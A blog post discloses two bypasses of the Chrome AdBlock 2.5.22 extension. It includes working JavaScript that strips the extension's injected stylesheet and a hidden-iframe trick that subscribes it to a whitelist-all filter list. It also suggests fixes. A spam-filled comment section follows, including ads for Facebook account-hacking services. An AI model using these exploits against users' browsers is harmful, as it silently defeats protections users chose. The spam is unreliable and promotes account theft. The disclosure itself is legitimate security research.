tl;dr: Chrome AdBlock 2.5.22 bypasses, demo here and here, but I'd advise you to read on.
Preparation
If you want to analyze the extension code yourself, use my download script to fetch the addon from Chrome Web Store and read on:// you need PHP with openssl extension and command line unzip for this $ mkdir addons $ php download.php gighmmpiobklfepjocnamgkkbiglidom AdBlockOf course, you don't need to, but if you won't it makes me sad :/
Small bypass - disabling filter injection
Like many Chrome extensions, AdBlock alters the content of the webpages you see by modifying a page DOM. For example, it injects a <link rel=stylesheet> that hides all ads with CSS. This all happens in adblock_start_common.js:function block_list_via_css(selectors) {
  var d = document.head || document.documentElement;
//....
  // Issue 6480: inserting a <style> tag too quickly made it be ignored.
  // Use ABP's approach: a <link> tag that we can check for .sheet.
  var css_chunk = document.createElement("link");
  css_chunk.type = "text/css";
  css_chunk.rel = "stylesheet";
  css_chunk.href = "data:text/css,";
  d.insertBefore(css_chunk, null);
// ... and fill the node contents later on
Sweet & cool, right? But the problem is websites have tons of ways to defend themselves from being altered. After all, it's their DOM you're messing with. So, the easiest bypass would be to listen for anyone adding a stylesheet and removing it.function block(node) {
    if (   (node.nodeName == 'LINK' && node.href == 'data:text/css,') // new style
        || (node.nodeName == 'STYLE' && node.innerText.match(/^\/\*This block of style rules is inserted by AdBlock/)) // old style
        ) {
        node.parentElement.removeChild(node);
    }
}
document.addEventListener("DOMContentLoaded", function() {
    document.addEventListener('DOMNodeInserted', function(e) {
    // disable blocking styles inserted by AdBlock
    block(e.target);
    }, false);
    
}, false);
In the effect the stylesheet is removed and the ads are not hidden anymore. See in the demo. This is similar to how many Chrome extensions work. Extension authors should remember that you can't rely on page DOM to be cool with you, it can actively prevent modification. In other words, it's not your backyard, behave.Total bypass - Disable AdBlock for good
The previous one was a kid's play, but the real deal is here. Any website can detect if you're using Chrome AdBlock and disable it completely for the future. It is possible thanks to a vulnerability in a filter subscription page. Subscription code works by launching chrome-extension://gighmmpiobklfepjocnamgkkbiglidom/pages/subscribe.html page. Here's what happens:// pages/subscribe.js
  //Get the URL
  var queryparts = parseUri.parseSearch(document.location.search);
  ...
  //Subscribe to a list
  var requiresList = queryparts.requiresLocation ?
      "url:" + queryparts.requiresLocation : undefined;
  BGcall("subscribe",
      {id: 'url:' + queryparts.location, requires:requiresList});
First, the query string for the page is parsed and than a subscription request is sent to extension background page getting the location parameter. So, when extension launches subscribe.html?location=http://example.com this will subscribe to a filter from URL http://example.com.All neat, but what extension authors don't know, standard web pages page can load your extension resources too. In the future, extension authors can limit this by using web_accessible_resources, but for Current Chrome 17 it's not possible.
So, what is the easiest way to disable Chrome AdBlock? Make it subscribe to a whitelist-all list:
<iframe style="position:absolute;left:-1000px;" id="abp" src=""></iframe>
//...
document.getElementById('abp').src = 'chrome-extension://'+addon_id + '/pages/subscribe.html?location=' + location.href.replace('disable.html', 'list.txt');
See for yourself in the demo. To reenable AdBlock functionality go to extension settings, choose the filter list tab and disable the last added filter (koto.github.com one).
How to fix this in the code? Don't rely on the URL of your extension resource to perform some action.

 
 
 Posts
Posts
 
 
37 comments:
Nice job.
Have you let the author of Adblock know about the sploits? I don't know coding, so my questions may be stupid. But, is this more of a Chrome problem, an extension problem (in general), or more like a advertiser cat vs mouse type of thing?
Btw, there is an extension (you may or may not be aware of/interested in) for Chrome thats kind of supposed to work like NoScript for Firefox called NoScript, but its really really in early development and kind of breaks everything. https://code.google.com/p/scriptno/
and firefox's adblock is not exploitable because it uses browser level filters ,something chrome doesnt let you do
Great article!
Thanks for the article, it's very interesting.
Anyway, the best adblock you can have is turning plug-ins (Flash) off, which is supereasy in Opera, easy in Chrome, and possible in Firefox with Flashblock (there might be easier way I don't know about). And then whitelist sites like Gmail, YouTube, Google Maps or Dropbox, which use Flash for something useful.
Nice vulnerability you found there. Just a note: Adblock Plus for Chrome is not affected, only Adblock. As to CSS tricks - yes, that's a Chrome limitation and not something that extension authors can currently fix (Adblock Plus for Firefox is fine).
Yup, we have to wait for webRequest ( http://code.google.com/chrome/extensions/trunk/webRequest.html ) until real ad blocking is supported, so I consider the first vulnerability just a sweet, interesting trick. But you should fix the second one nonetheless ;)
Sorry, I confused the extensions - so many AdBlocks to choose from ;) I've already contacted Michael about the issues.
Yes, it is confusing. Wasn't my idea to name a competing extension "Adblock".
Anyway, I think that Adblock Plus is completely waterproof now. Web pages can no longer mess with extension pages, not even theoretically.
Thanks for the heads up, Krzysztof. The next release of AdBlock will fix the second vulnerability. As Wladimir mentioned, the first only prevents hiding rules from working, though blocking will still work.
It's ScriptNo, and once you start Trusting a few sites it doesn't seem to break anything anymore; in this respect it is like NoScript's default setup. Also it's fairly mature by now, having switched over to using the ContentSettings and WebRequest APIs available with Chrome 17.
It doesn't, however, have some of the more advanced functionality of NoScript, like surrogate scripts, the XSS filter, or the Application Boundaries Enforcer, and it also doesn't block plugins (but the click-to-play flag is available for that, and Chrome blocks most plugins by default anyway) or frames (but Better Popup Blocker works well for that).
"After all, it's their DOM your messing with"
I'm not usually a grammar nazi, but this "your" just makes me cringe.
Agrh, fixed, thanks!
Thanks for telling all the spammers
ಠ_ಠ
Doesn't work on AdBlock Plus ;D
Valuable information and excellent design you got here! I would like to thank you for sharing your thoughts and time into the stuff you post!! Thumbs up. www.cheapbeatsearphones.com/
I don't want sex ads on my wall on pinterest and ad block was working perfectly, now it's not and they are back. I want them off. I'm my pinterest account and I have thousands of followers. I dont' really want to see dirty derik cums for you on my wall! I'm pretty pissed. How do I get it off my walls. Disgusted!
"After all, it's their DOM you're messing with"
on their server it is. In my cache it is MINE to alter as I please for my selective viewing
1loopback proxy adblocking is not affected. AdBlock (Plus) ought offer this model as an alternative. xulrunner?
2
[at] kotowicz : ScriptNo (chromium)
" a advertiser cat vs mouse type of thing?"
Guess who always wins?
(hint: not the ad servers)
Adblock will fight back and overcome this NO ADDS ADDS ARE A GOVERNMENT CONSPIRICY TO USE BANDWIDTH AND STOP PEOPLE UNDERSTANDING THAT ANYWEBSITE THAT BLOCKS IT IS A SHIT SMALL ONE THAT ISN'T WORTH GOING ON
If I could say one thing about this blog it would be
design! I mean, I was so distracted by the clashing colours that it was pointless to try to read the blog. What are trying to do here exactly? No one can read this is if it looks like a kid smashed a box of Crayola on your page! Please do something about this.http://www.escortchaps.co.uk/
I'm excited to discover this web site. I wanted to thank you for your time due to this wonderful read!! I definitely appreciated every part of it and I have you book-marked to see new things in your web site. Ever wanted to hack your friends or foes facebook account? Worry not, we have the simplest and easiest tool to hack any facebook profile or account for free. Just visit www.hackfbaccount.net and start hacking.
Good post. I learn something new and challenging on sites I stumbleupon everyday. It's always useful to read through content from other writers and practice a little something from other websites. Ever wanted to hack your friends or foes facebook account? Just visit www.hackfbaccounts.org and hack anyboy today. No strings attached. It takes just 2 minutes to hack any facebook account.
A community for technical news and discussion of
information security and closely related topics. Posting Guidelines.
Always link to the original ...
coaster ville facebook
Sorry for the significant assessment, but I'm honestly loving the new Zune, and hope this, together with the wonderful evaluations some other persons have written, will assist you to make a decision if it is the right choice for you.sizegenetics discount
Let me start off by saying nice post. Im not certain if it has been talked about, but when utilizing Chrome I can never get the whole site to load without refreshing numerous times. Could just be my computer system. Thanks.stellar phoenix photo recovery
I'm typically to blogging and i genuinely appreciate your posts. The article has truly peaks my interest. I am going to bookmark your website and maintain checking picking particulars.wondershare dr fone
Does this still work?
A great way of making me feel like what you have to say is just as important to me as it is to you. Keep it up!
Clipping Path service
INTERNATIONAL CONCEPT OF WORK FROM HOME
Work from home theory is fast gaining popularity because of the freedom and flexibility that comes with it. Since one is not bound by fixed working hours, they can schedule their work at the time when they feel most productive and convenient to them. Women & Men benefit a lot from this concept of work since they can balance their home and work perfectly. People mostly find that in this situation, their productivity is higher and stress levels lower. Those who like isolation and a tranquil work environment also tend to prefer this way of working. Today, with the kind of communication networks available, millions of people worldwide are considering this option.
Women & Men who want to be independent but cannot afford to leave their responsibilities at home aside will benefit a lot from this concept of work. It makes it easier to maintain a healthy balance between home and work. The family doesn't get neglected and you can get your work done too. You can thus effectively juggle home responsibilities with your career. Working from home is definitely a viable option but it also needs a lot of hard work and discipline. You have to make a time schedule for yourself and stick to it. There will be a time frame of course for any job you take up and you have to fulfill that project within that time frame.
There are many things that can be done working from home. A few of them is listed below that will give you a general idea about the benefits of this concept.
Baby-sitting
This is the most common and highly preferred job that Women & Men like doing. Since in today's competitive world both the parents have to work they need a secure place to leave behind their children who will take care of them and parents can also relax without being worried all the time. In this job you don't require any degree or qualifications. You only have to know how to take care of children. Parents are happy to pay handsome salary and you can also earn a lot without putting too much of an effort.
Nursery
For those who have a garden or an open space at your disposal and are also interested in gardening can go for this method of earning money. If given proper time and efforts nursery business can flourish very well and you will earn handsomely. But just as all jobs establishing it will be a bit difficult but the end results are outstanding.
Freelance
Freelance can be in different wings. Either you can be a freelance reporter or a freelance photographer. You can also do designing or be in the advertising field doing project on your own. Being independent and working independently will depend on your field of work and the availability of its worth in the market. If you like doing jewellery designing you can do that at home totally independently. You can also work on freelancing as a marketing executive working from home. Wanna know more, email us on workfromhome.otr214425@gmail.com and we will send you information on how you can actually work as a marketing freelancer.
Internet related work
This is a very vast field and here sky is the limit. All you need is a computer and Internet facility. Whatever field you are into work at home is perfect match in the software field. You can match your time according to your convenience and complete whatever projects you get. To learn more about how to work from home, contact us today on workfromhome.otr2144225@gmail.comand our team will get you started on some excellent work from home projects.
Diet food
Since now a days Women & Men are more conscious of the food that they eat hence they prefer to have homemade low cal food and if you can start supplying low cal food to various offices then it will be a very good source of income and not too much of efforts. You can hire a few ladies who will help you out and this can be a good business.
Thus think over this concept and go ahead.
pou hack and pou codes for pou
شركة شراء اثاث مستعمل بالرياض
حقين بيع الاثاث
شراء اثاث مستعمل بشمال الرياض
شركة تسليك مجارى بالدمام
شركة تنظيف مسابح بالدمام
شركة تنظيف موكيت بالدمام
شركة مكافحة حشرات بالدمام
شركة كشف تسربات بالدمام
شركة نظافة عامة بالدمام
شركة نقل اثاث بالدمام
شركة تسليك مجارى بالرياض
تخزين اثاث بالرياض
كشف تسربات بالرياض
مكافحة حشرات بالرياض
نقل اثاث بالرياض
الان سوف تجد من خلال شركة يونيون اير المتقدم في العمل علي اعلي مستوي من التقدم استمتع مع صيانة يونيون اير التي تتميز بكافة الخدمات المتميزه والمتطورة في كافة الاعمال المتميزه في العمل علي اعلي مستوي من التقدم .
خدمات الصيانة علي اعلي جودة في مصر من افضل الشركات دليل الصيانات الشامل سوف يقدم اليكم كافة الاعمال و صيانة بيكو من افضل المراكز المتميزه في العمل علي اعلي مستوي صيانة يونيون اير
التي بها جميع الاعمال المتميزه .
صيانة كافة الاجهزة المنزلية بيد متخصصين ذو كفاءه عالية ومتميزه في العمل مع شركة العالمية لدينا صيانة جليم جاز المعتمدة في صيانة الاجهزة الكهربائية علي اعلي اعلي جودة في مصر استمتع بكفاة الخدمات المتميزه والعالمية .
Post a Comment